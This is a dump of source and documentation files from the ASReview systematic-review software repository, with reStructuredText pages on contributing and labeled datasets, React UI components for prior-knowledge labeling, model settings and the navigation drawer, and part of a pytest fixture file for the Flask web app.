"reStructuredText", "length_bytes": 1412, "license_type": "permissive", "max_line_length": 396, "num_lines": 31, "path": "/docs/source/contribute.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Support\n-------\n\nQuestions can be asked on `GitHub Discussions <https://github.com/asreview/asreview/discussions>`__. For bug reports and feature requests, please submit an issue on `GitHub <https://github.com/asreview/asreview/issues/new/choose>`__.\n\nDonate\n~~~~~~\n\nThe ASReview software is Free and Open Source Software (FOSS). To support the\ndevelopment, you can donate on the `ASReview donation page\n<https://asreview.ai/donate/>`_. Even small donations are highly appreciated!\n\n\nCollaborate\n~~~~~~~~~~~\n\nIf you are interested in (scientific) collaboration, `contact\nProf. Dr. Rens van de Schoot <https://www.rensvandeschoot.com/contact/>`_ or send an email to [email protected].\n\n\nContribute\n~~~~~~~~~~\n\nHow do you go from user to contributor? There are many ways to join in, and it might be less complicated than you expect. In a `blogpost <https://asreview.nl/blog/open-source-and-research/>`_, we list some easy examples for first-time contributors, for example sharing your experiences or answering user questions on the `Discussion platform <https://github.com/asreview/asreview/discussions>`_. \n\nSpecific instructions for code-contributing are available on `Github <https://github.com/asreview/asreview/blob/master/CONTRIBUTING.md>`_ as well as instructions for `developers <https://github.com/asreview/asreview/blob/master/DEVELOPMENT.md>`_.\n\n\n.. 
note::\n\n\tAll contributions, small or large, are very much appreciated!\n\n\n\n\n" }, { "alpha_fraction": 0.7383720874786377, "alphanum_fraction": 0.7383720874786377, "avg_line_length": 56.33333206176758, "blob_id": "5322096d8560d191065d6f0ddeef1cddb4d1614a", "content_id": "bb330c5b8cb45216446a5fc2344d7afb6958daff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 344, "license_type": "permissive", "max_line_length": 67, "num_lines": 6, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as Filter } from \"./Filter\";\nexport { default as HistoryPage } from \"./HistoryPage\";\nexport { default as LabelChip } from \"./LabelChip\";\nexport { default as LabeledRecord } from \"./LabeledRecord\";\nexport { default as LabeledRecordCard } from \"./LabeledRecordCard\";\nexport { default as RecordCardNote } from \"./RecordCardNote\";\n" }, { "alpha_fraction": 0.753739058971405, "alphanum_fraction": 0.7568334341049194, "avg_line_length": 38.57143020629883, "blob_id": "02883ac7e20d331666ddb8a1f2d3f0c4f4382ad8", "content_id": "f23903a67ae6362632c4ddff989b2aa039833889", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3878, "license_type": "permissive", "max_line_length": 124, "num_lines": 98, "path": "/docs/source/data_labeled.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Fully and partially labeled data\n================================\n\nFully and partially labeled datasets serve a special role in the ASReview\ncontext. These datasets have review decisions for a subset of the records or\nfor all records in the dataset. \n\n.. tip::\n\n :ref:`data_labeled:Partially labeled data` is useful in the Oracle\n mode, whereas :ref:`data_labeled:Fully labeled data` is useful in the Simulation\n and Exploration mode.\n\n\n\nLabel format\n------------\n\n\nFor tabular datasets (:doc:`e.g., CSV, XLSX <data_format>`), the dataset\nshould contain a column called \"included\" or \"label\" (See :ref:`Data format\n<column-names>` for all naming conventions), which is filled with ``1``'s or\n``0``'s for the records that are already screened, or selected by experts to\nbe used for prior knowledge. The value is left empty for the records that you\nhaven't screened yet, or which are added to the dataset.\n\n\n\nFor the RIS file format, the labels ``ASReview_relevant``,\n``ASReview_irrelevant``, and ``ASReview_not_seen``) can be stored with the N1\n(Notes) tag. An example of a RIS file with labels in the N1 tag can be found\nin the `ASReview GitHub repository\n<https://github.com/asreview/asreview/blob/master/tests/demo_data/baseline_tag-notes_labels.ris>`_.\nAll labels in this example are valid ways to label the data. \n\n\n.. note::\n\n Exported files containing labeling decisions can be imported into ASReview LAB again,\n and whereafter all labels are recognized.\n\n\n\nPartially labeled data\n----------------------\n\n.. tip::\n\n\tUseful for Oracle projects. Read more about :ref:`project_create:Project modes`.\n\nPartially labeled datasets are datasets with a labeling decision for a subset\nof the records in the dataset and no decision for another subset. \n\nA partially labeled dataset can be obtained by exporting results from ASReview\nLAB or other software. 
It can also be constructed given the format described\nabove by merging a labeled dataset with new unlabeled records.\n\nPartially labeled datasets are useful as the labels will be recognized by\nASReview LAB as :ref:`Prior Knowledge <project_create:Select Prior Knowledge>`, and labels are used to\ntrain the first iteration of the active learning model.\n\n.. note::\n\n Merging labeled with unlabeled data should be done outside ASReview LAB, for\n example, with :ref:`data:Citation Managers`.\n\n\nFully labeled data\n------------------\n\n.. tip::\n\n\tUseful for Simulation and Exploration projects. Read more about :ref:`project_create:Project modes`.\n\nFully labeled datasets are datasets with a labeling decision for each record in\nthe dataset. Fully labeled datasets are useful for exploration or simulation\npurposes (see also :ref:`simulation_overview:What is a simulation?` and\n:ref:`project_create:Project modes`). \n\n\nBenchmark datasets\n~~~~~~~~~~~~~~~~~~\n\nThe `ASReview research project <https://asreview.ai/about/>`_ collects fully\nlabeled datasets published open access. The labeled datasets are PRISMA-based\nsystematic reviews or meta-analyses on various research topics. They can be\nuseful for teaching purposes or for testing the performance of (new) active\nlearning models. The datasets and their metadata are available via the\n`SYNERGY Dataset <https://github.com/asreview/synergy-dataset>`_ repository. In\nASReview LAB, these datasets are found under \"Benchmark Datasets\".\n\nThe Benchmark Datasets are directly available in the software. During the\n:ref:`project_create:Add Dataset` step of the project setup, there is a panel\nwith all the datasets. The datasets can be selected and used directly.\nBenchmark datasets are also available via the :doc:`simulation_cli`. Use the prefix\n``synergy:`` followed by the identifier of the dataset (see `Synergy Dataset <https://github.com/asreview/synergy-dataset>`_\nrepository). For example, to use the Van de Schoot et al. 
(2018) dataset, use\n``synergy:van_de_schoot_2018``.\n" }, { "alpha_fraction": 0.422229528427124, "alphanum_fraction": 0.42486023902893066, "avg_line_length": 27.157407760620117, "blob_id": "6ee7d0ab0eafc9f418e7a9f64c8baa9e01f5fcaa", "content_id": "e3b9dfe8264bb0385663d104fd28395b2c7a18a4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6082, "license_type": "permissive", "max_line_length": 86, "num_lines": 216, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/PriorUnlabeled.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { connect } from \"react-redux\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport TruncateMarkup from \"react-truncate-markup\";\nimport {\n Box,\n Button,\n Card,\n CardActions,\n CardContent,\n Divider,\n Link,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { ExplorationModeRecordAlert } from \"../../../StyledComponents/StyledAlert.js\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../../globals.js\";\n\nconst PREFIX = \"PriorUnlabeled\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n icon: `${PREFIX}-icon`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n width: \"100%\",\n [`& .${classes.root}`]: {\n borderRadius: 16,\n },\n\n [`& .${classes.icon}`]: {\n marginLeft: \"auto\",\n },\n}));\n\nconst PriorUnlabeled = (props) => {\n const queryClient = useQueryClient();\n const [recordReadMore, setRecordReadMore] = React.useState(null);\n\n const { error, isError, mutate, reset } = useMutation(\n ProjectAPI.mutateClassification,\n {\n mutationKey: \"mutatePriorKnowledge\",\n onSuccess: (data, variables) => {\n queryClient.invalidateQueries(\"fetchLabeledStats\");\n queryClient.invalidateQueries([\n \"fetchLabeledRecord\",\n { subset: [\"all\"] },\n ]);\n if (!variables.label) {\n queryClient.invalidateQueries([\n \"fetchLabeledRecord\",\n { subset: [\"irrelevant\"] },\n ]);\n } else {\n queryClient.invalidateQueries([\n \"fetchLabeledRecord\",\n { subset: [\"relevant\"] },\n ]);\n }\n if (props.keyword) {\n // update cached data\n queryClient.setQueryData(\n [\n \"fetchPriorSearch\",\n {\n project_id: props.project_id,\n keyword: props.keyword,\n },\n ],\n (prev) => {\n return {\n ...prev,\n result: prev.result.map((record) => {\n return {\n ...record,\n included:\n record.id === variables.doc_id\n ? variables.label\n : record.included,\n };\n }),\n };\n },\n );\n } else {\n // update cached data\n queryClient.setQueryData(\n [\n \"fetchPriorRandom\",\n {\n project_id: props.project_id,\n n: props.nRecords,\n subset:\n props.mode !== projectModes.ORACLE ? props.subset : null,\n },\n ],\n (prev) => {\n return {\n ...prev,\n result: prev.result.map((record) => {\n return {\n ...record,\n included:\n record.id === variables.doc_id\n ? 
variables.label\n : record.included,\n };\n }),\n };\n },\n );\n }\n },\n },\n );\n\n const isDebugInclusion = () => {\n if (props.record) {\n return props.record._debug_label === 1;\n }\n };\n\n return (\n <Root>\n {isError && (\n <Box sx={{ pt: 8 }}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={reset}\n button={true}\n />\n </Box>\n )}\n {!isError && (\n <Card elevation={3} className={classes.root}>\n {props.record._debug_label !== null && (\n <ExplorationModeRecordAlert\n label={!isDebugInclusion() ? \"irrelevant\" : \"relevant\"}\n />\n )}\n <CardContent className=\"record-card-content\">\n <Typography gutterBottom variant=\"h6\">\n {props.record.title ? props.record.title : \"No title available\"}\n </Typography>\n <TruncateMarkup\n lines={props.record.id === recordReadMore ? Infinity : 6}\n ellipsis={\n <span>\n ...{\" \"}\n <Link\n component=\"button\"\n underline=\"none\"\n onClick={() => setRecordReadMore(props.record.id)}\n >\n read more\n </Link>\n </span>\n }\n >\n <Typography sx={{ color: \"text.secondary\" }}>\n {props.record.abstract\n ? props.record.abstract\n : \"No abstract available\"}\n </Typography>\n </TruncateMarkup>\n </CardContent>\n <Divider />\n <CardActions sx={{ justifyContent: \"space-between\" }}>\n <Typography variant=\"body2\" sx={{ ml: 1 }}>\n Is this record relevant?\n </Typography>\n <Box>\n <Button\n onClick={() => {\n mutate({\n project_id: props.project_id,\n doc_id: props.record.id,\n label: 1,\n note: \"\",\n initial: true,\n is_prior: 1,\n });\n }}\n size=\"small\"\n >\n Yes\n </Button>\n <Button\n onClick={() => {\n mutate({\n project_id: props.project_id,\n doc_id: props.record.id,\n label: 0,\n note: \"\",\n initial: true,\n is_prior: 1,\n });\n }}\n size=\"small\"\n >\n No\n </Button>\n </Box>\n </CardActions>\n </Card>\n )}\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(PriorUnlabeled);\n" }, { "alpha_fraction": 0.4735788106918335, "alphanum_fraction": 0.4742462933063507, "avg_line_length": 36.610877990722656, "blob_id": "ffa32d53f7b05a18d10b0ae1e4261a8dbb6940bb", "content_id": "cb40af3038c1880c8d503d77874922a20366d4fd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8989, "license_type": "permissive", "max_line_length": 106, "num_lines": 239, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/ModelForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Box,\n FormControl,\n InputLabel,\n Link,\n MenuItem,\n Select,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../Components\";\nimport { SelectItem } from \"../../ProjectComponents\";\nimport { MouseOverPopover } from \"../../StyledComponents/StyledPopover.js\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\nimport { ProjectAPI } from \"../../api/index.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst ModelForm = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const {\n data: modelOptions,\n error: fetchModelOptionsError,\n isError: isFetchModelOptionsError,\n isFetched: isFetchedModelOptions,\n isFetching: isFetchingModelOptions,\n isSuccess: isSuccessModelOptions,\n } = 
useQuery(\"fetchModelOptions\", ProjectAPI.fetchModelOptions, {\n refetchOnWindowFocus: false,\n });\n\n const {\n data: modelConfig,\n error: fetchModelConfigError,\n isError: isFetchModelConfigError,\n isFetched: isFetchedModelConfig,\n isFetching: isFetchingModelConfig,\n isSuccess: isSuccessModelConfig,\n } = useQuery(\n [\"fetchModelConfig\", { project_id }],\n ProjectAPI.fetchModelConfig,\n {\n enabled: project_id !== null,\n refetchOnWindowFocus: false,\n },\n );\n\n const returnModelError = () => {\n if (isFetchModelOptionsError && !isFetchModelConfigError) {\n return fetchModelOptionsError?.message;\n }\n if (isFetchModelConfigError && !isFetchModelOptionsError) {\n return fetchModelConfigError?.message;\n }\n if (isFetchModelOptionsError && isFetchModelConfigError) {\n return (\n fetchModelOptionsError?.message + \" \" + fetchModelConfigError?.message\n );\n }\n };\n\n const refetchModel = () => {\n if (isFetchModelOptionsError) {\n queryClient.resetQueries(\"fetchModelOptions\");\n }\n if (isFetchModelConfigError) {\n queryClient.resetQueries(\"fetchModelConfig\");\n }\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n <Box>\n <TypographySubtitle1Medium>Model</TypographySubtitle1Medium>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n An active learning model consists of a feature extraction technique,\n a classifier, a query strategy, and a balance strategy. The default\n setup (TF-IDF, Naive Bayes, Maximum, Dynamic resampling) overall has\n fast and excellent performance.{\" \"}\n <Link\n underline=\"none\"\n href={`https://asreview.nl/blog/active-learning-explained/`}\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n </Box>\n {!isFetchModelOptionsError &&\n !isFetchModelConfigError &&\n !isFetchingModelOptions &&\n !isFetchingModelConfig &&\n isFetchedModelOptions &&\n isFetchedModelConfig &&\n isSuccessModelOptions &&\n isSuccessModelConfig && (\n <Box component=\"form\" noValidate autoComplete=\"off\">\n <Stack direction=\"column\" spacing={3}>\n <MouseOverPopover title=\"Select feature extraction technique when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"feature-extraction-select-label\">\n Feature extraction technique\n </InputLabel>\n <Select\n id=\"select-feature-extraction\"\n name=\"feature_extraction\"\n label=\"Feature extraction technique\"\n value={modelConfig?.feature_extraction}\n >\n {modelOptions?.feature_extraction.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={\n modelConfig?.feature_extraction === value.name\n }\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n <MouseOverPopover title=\"Select classifier when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"classifier-select-label\">\n Classifier\n </InputLabel>\n <Select\n labelId=\"select-classifier-label\"\n id=\"select-classifier\"\n name=\"classifier\"\n label=\"Classifier\"\n value={modelConfig?.model}\n >\n {modelOptions?.classifier.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={modelConfig?.model === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n <MouseOverPopover title=\"Select query strategy when creating a new 
project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"query-strategy-select-label\">\n Query strategy\n </InputLabel>\n <Select\n id=\"select-query-strategy\"\n name=\"query_strategy\"\n label=\"Query strategy\"\n value={modelConfig?.query_strategy}\n >\n {modelOptions?.query_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={modelConfig?.query_strategy === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n <MouseOverPopover title=\"Select balance strategy when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"balance-strategy-select-label\">\n Balance strategy\n </InputLabel>\n <Select\n id=\"select-balance-strategy\"\n name=\"balance_strategy\"\n label=\"Balance strategy\"\n value={modelConfig?.balance_strategy}\n >\n {modelOptions?.balance_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={\n modelConfig?.balance_strategy === value.name\n }\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n </Stack>\n </Box>\n )}\n {(isFetchModelOptionsError || isFetchModelConfigError) && (\n <InlineErrorHandler\n message={returnModelError()}\n refetch={refetchModel}\n button={true}\n />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default ModelForm;\n" }, { "alpha_fraction": 0.4998127818107605, "alphanum_fraction": 0.5025275945663452, "avg_line_length": 26.180662155151367, "blob_id": "5e9ef5f0c6322d2d12d62326b316819467dfb904", "content_id": "41ac1697e16ebb28a04be9f1ea843873a030706f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10682, "license_type": "permissive", "max_line_length": 78, "num_lines": 393, "path": "/asreview/webapp/src/Components/DrawerItemContainer.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useIsFetching, useQueryClient } from \"react-query\";\nimport { useSelector } from \"react-redux\";\nimport { Route, Routes, useParams } from \"react-router-dom\";\nimport {\n Button,\n Dialog,\n DialogActions,\n DialogContent,\n DialogTitle,\n Divider,\n Fade,\n List,\n ListItem,\n ListItemButton,\n ListItemIcon,\n ListItemText,\n Tooltip,\n Typography,\n} from \"@mui/material\";\n\nimport { styled } from \"@mui/material/styles\";\nimport { Diversity3, Help, Payment, Settings } from \"@mui/icons-material\";\n\nimport { DrawerItem, ElasGame } from \"../Components\";\nimport { ProjectAPI } from \"../api/index.js\";\nimport {\n communityURL,\n donateURL,\n projectModes,\n projectStatuses,\n} from \"../globals.js\";\nimport Finished from \"../images/ElasHoldingSIGNS_Finished.svg\";\nimport InReview from \"../images/ElasHoldingSIGNS_InReview.svg\";\nimport SetUp from \"../images/ElasHoldingSIGNS_SetUp.svg\";\n\nconst PREFIX = \"DrawerItemContainer\";\n\nconst classes = {\n topSection: `${PREFIX}-topSection`,\n bottomSection: `${PREFIX}-bottomSection`,\n icon: `${PREFIX}-icon`,\n projectInfo: `${PREFIX}-projectInfo`,\n yourProject: `${PREFIX}-yourProject`,\n projectTitle: `${PREFIX}-projectTitle`,\n stateElas: `${PREFIX}-stateElas`,\n};\n\nconst StyledList = styled(List)(({ theme }) => ({\n overflow: \"hidden\",\n display: 
\"flex\",\n flexDirection: \"column\",\n flexGrow: 1,\n [`& .${classes.topSection}`]: {\n overflowX: \"hidden\",\n overflowY: \"auto\",\n flex: \"1 1 auto\",\n },\n\n [`& .${classes.bottomSection}`]: {\n overflow: \"hidden\",\n flex: \"0 0 auto\",\n },\n\n [`& .${classes.icon}`]: {\n paddingLeft: 8,\n },\n\n [`& .${classes.projectInfo}`]: {\n display: \"block\",\n \"& > *\": {\n marginTop: theme.spacing(2),\n },\n },\n\n [`& .${classes.yourProject}`]: {\n paddingLeft: 12,\n paddingRight: 12,\n },\n\n [`& .${classes.projectTitle}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 2,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n\n [`& .${classes.stateElas}`]: {\n width: \"100%\",\n maxWidth: \"140px\",\n display: \"block\",\n margin: \"auto\",\n },\n}));\n\nconst DrawerItemContainer = (props) => {\n const { project_id } = useParams();\n const authentication = useSelector((state) => state.authentication);\n const allowTeams = useSelector((state) => state.allow_teams);\n const queryClient = useQueryClient();\n\n const isFetchingInfo = useIsFetching(\"fetchInfo\");\n\n const [projectInfo, setProjectInfo] = React.useState(null);\n\n const fetchProjectInfo = React.useCallback(async () => {\n const data = await queryClient.fetchQuery(\n [\"fetchInfo\", { project_id }],\n ProjectAPI.fetchInfo,\n );\n setProjectInfo(data);\n }, [project_id, queryClient]);\n\n const returnElasState = () => {\n // setup\n if (\n projectInfo?.reviews[0] === undefined ||\n projectInfo?.reviews[0].status === projectStatuses.SETUP\n ) {\n return SetUp;\n }\n\n // review\n if (projectInfo?.reviews[0].status === projectStatuses.REVIEW) {\n return InReview;\n }\n\n // finished\n if (projectInfo?.reviews[0].status === projectStatuses.FINISHED) {\n return Finished;\n }\n };\n\n /**\n * Drawer items on home page\n * Any change here requires change in DrawerItem\n */\n const drawerItemsHomePage = [\n {\n path: \"/projects\",\n label: \"Projects\",\n },\n ];\n /**\n * Drawer items on project page\n * Any change here requires change in DrawerItem\n */\n const drawerItemsProjectPage = [\n {\n path: \"\",\n label: \"Analytics\",\n },\n {\n path: \"review\",\n label: \"Review\",\n },\n {\n path: \"history\",\n label: \"History\",\n },\n ...(authentication && allowTeams\n ? 
[\n {\n path: \"team\",\n label: \"Team\",\n },\n ]\n : []),\n {\n path: \"export\",\n label: \"Export\",\n },\n {\n path: \"details\",\n label: \"Details\",\n },\n ];\n\n const [openGame, setOpenGame] = React.useState(false);\n const [attemps, setAttempts] = React.useState(0);\n\n const toggleGame = () => {\n if (!openGame) {\n setAttempts(0);\n }\n setOpenGame(!openGame);\n };\n\n const addAttempt = () => {\n setAttempts(attemps + 1);\n };\n\n const descriptionElementRef = React.useRef(null);\n React.useEffect(() => {\n if (openGame) {\n const { current: descriptionElement } = descriptionElementRef;\n if (descriptionElement !== null) {\n descriptionElement.focus();\n }\n }\n }, [openGame]);\n\n React.useEffect(() => {\n if (project_id && isFetchingInfo) {\n fetchProjectInfo();\n } else {\n setProjectInfo(null);\n }\n }, [fetchProjectInfo, project_id, isFetchingInfo]);\n\n return (\n <StyledList aria-label=\"drawer item container\">\n {/* Top Section: Home page drawer */}\n <Routes>\n <Route\n path=\"*\"\n element={\n <Fade in>\n <div className={classes.topSection}>\n {drawerItemsHomePage.map((element, index) => {\n return (\n <DrawerItem\n key={index}\n path={element.path}\n label={element.label}\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n />\n );\n })}\n </div>\n </Fade>\n }\n />\n\n {/* Top Section: Project page drawer */}\n <Route\n path=\"projects/:project_id/*\"\n element={\n <Fade in>\n <div className={classes.topSection}>\n <DrawerItem\n mobileScreen={props.mobileScreen}\n label=\"Projects\"\n path=\"/projects\"\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n />\n {projectInfo && (\n <ListItem\n className={classes.projectInfo}\n onClick={toggleGame}\n >\n <img\n src={returnElasState()}\n alt=\"ElasState\"\n className={classes.stateElas}\n />\n\n <Fade in={props.onNavDrawer} unmountOnExit>\n <div className={classes.yourProject}>\n <Typography variant=\"subtitle2\">\n Your project\n </Typography>\n <Typography\n className={classes.projectTitle}\n variant=\"body2\"\n color=\"textSecondary\"\n >\n {projectInfo ? projectInfo.name : \"Null\"}\n </Typography>\n </div>\n </Fade>\n </ListItem>\n )}\n\n {projectInfo &&\n drawerItemsProjectPage\n .filter((element) => {\n return projectInfo?.mode !== projectModes.SIMULATION\n ? 
element\n : element.path !== \"review\";\n })\n .map((element, index) => {\n return (\n <DrawerItem\n key={index}\n path={element.path}\n label={element.label}\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n />\n );\n })}\n </div>\n </Fade>\n }\n />\n </Routes>\n\n {/* Bottom Section */}\n <div className={classes.bottomSection}>\n <Divider />\n {donateURL !== undefined && (\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Donate\">\n <ListItemButton\n component={\"a\"}\n color=\"inherit\"\n href={donateURL}\n target=\"_blank\"\n >\n <ListItemIcon className={classes.icon}>\n <Payment />\n </ListItemIcon>\n <ListItemText primary=\"Donate\" />\n </ListItemButton>\n </Tooltip>\n )}\n {communityURL !== undefined && (\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Community\">\n <ListItemButton\n component={\"a\"}\n color=\"inherit\"\n href={communityURL}\n target=\"_blank\"\n >\n <ListItemIcon className={classes.icon}>\n <Diversity3 />\n </ListItemIcon>\n <ListItemText primary=\"Community\" />\n </ListItemButton>\n </Tooltip>\n )}\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Settings\">\n <ListItemButton\n onClick={() => {\n if (props.mobileScreen) {\n props.toggleNavDrawer();\n }\n props.toggleSettings();\n }}\n >\n <ListItemIcon className={classes.icon}>\n <Settings />\n </ListItemIcon>\n <ListItemText primary=\"Settings\" />\n </ListItemButton>\n </Tooltip>\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Help\">\n <ListItemButton\n onClick={() => {\n if (props.mobileScreen) {\n props.toggleNavDrawer();\n }\n props.toggleHelpDialog();\n }}\n >\n <ListItemIcon className={classes.icon}>\n <Help />\n </ListItemIcon>\n <ListItemText primary=\"Help\" />\n </ListItemButton>\n </Tooltip>\n </div>\n\n {/* Game */}\n <Dialog\n open={openGame}\n onClose={toggleGame}\n scroll={\"paper\"}\n fullWidth={true}\n maxWidth={\"lg\"}\n aria-labelledby=\"game-dialog-title\"\n aria-describedby=\"game-dialog-description\"\n >\n <DialogTitle id=\"game-dialog-title\">\n Elas Adventures Game (Attempts: {attemps})\n </DialogTitle>\n <DialogContent>\n <ElasGame addAttempt={addAttempt} />\n </DialogContent>\n <DialogActions>\n <Button onClick={toggleGame}>Take me back</Button>\n </DialogActions>\n </Dialog>\n </StyledList>\n );\n};\n\nexport default DrawerItemContainer;\n" }, { "alpha_fraction": 0.6692221164703369, "alphanum_fraction": 0.6721533536911011, "avg_line_length": 30.906475067138672, "blob_id": "69e56a08b82255b8a6708b3c7c8fc2272bd7dca6", "content_id": "e21f749421b4e724bfb9458a6eedf684fc531ef7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4435, "license_type": "permissive", "max_line_length": 74, "num_lines": 139, "path": "/asreview/webapp/tests/conftest.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nfrom pathlib import Path\n\nimport pytest\nfrom sqlalchemy.orm import close_all_sessions\n\nfrom asreview.webapp import DB\nfrom asreview.webapp.start_flask import create_app\nfrom asreview.webapp.tests.utils import crud\n\nPROJECTS = [\n {\n \"mode\": \"explore\",\n \"name\": \"demo project\",\n \"authors\": \"asreview team\",\n \"description\": \"hello world\",\n },\n {\n \"mode\": \"explore\",\n \"name\": \"another demo project\",\n \"authors\": \"asreview team\",\n \"description\": \"hello world\",\n },\n]\n\n\ndef _get_app(app_type=\"auth-basic\", path=None):\n \"\"\"Create and return a test flask app based on app_type.\"\"\"\n # set asreview path\n os.environ.update({\"ASREVIEW_PATH\": path})\n # get path of appropriate flask config\n base_dir = Path(__file__).resolve().parent / \"config\"\n if app_type == \"auth-basic\":\n config_path = str(base_dir / \"auth_basic_config.toml\")\n elif app_type == \"auth-no-creation\":\n config_path = str(base_dir / \"auth_no_creation.toml\")\n elif app_type == \"auth-verified\":\n config_path = str(base_dir / \"auth_verified_config.toml\")\n elif app_type == \"no-auth\":\n config_path = str(base_dir / \"no_auth_config.toml\")\n else:\n raise ValueError(f\"Unknown config {app_type}\")\n # create app\n app = create_app(flask_configfile=config_path)\n # and return it\n return app\n\n\[email protected](scope=\"function\", autouse=True)\ndef asreview_path_fixture(tmp_path_factory):\n \"\"\"Fixture that creates and removes the ASReview test\n directory for each test function.\"\"\"\n # create an ASReview folder\n asreview_path = tmp_path_factory.mktemp(\"asreview-test\")\n assert Path(asreview_path).exists()\n assert len(list(Path(asreview_path).glob('*'))) == 0\n yield str(asreview_path.absolute())\n # Pytest handles removal of ASReview folder\n\n\n# unauthenticated app\[email protected]\ndef unauth_app(asreview_path_fixture):\n \"\"\"Create an unauthenticated version of the app.\"\"\"\n # create the app\n app = _get_app(\"no-auth\", path=asreview_path_fixture)\n with app.app_context():\n yield app\n\n\n# authenticated app\[email protected]\ndef auth_app(asreview_path_fixture):\n \"\"\"Create an authenticated app, account creation\n allowed.\"\"\"\n # create app\n app = _get_app(path=asreview_path_fixture)\n with app.app_context():\n yield app\n\n\[email protected]\ndef client_auth(asreview_path_fixture):\n \"\"\"Flask client for basic authenticated app, account\n creation allowed.\"\"\"\n app = _get_app(\"auth-basic\", path=asreview_path_fixture)\n with app.app_context():\n yield app.test_client()\n crud.delete_everything(DB)\n close_all_sessions()\n DB.engine.raw_connection().close()\n\n\[email protected]\ndef client_auth_no_creation(asreview_path_fixture):\n \"\"\"Flask client for an authenticated app, account\n creation not allowed.\"\"\"\n app = _get_app(\"auth-no-creation\", path=asreview_path_fixture)\n with app.app_context():\n yield app.test_client()\n 
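# teardown: clear all test data and close database sessions\n 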
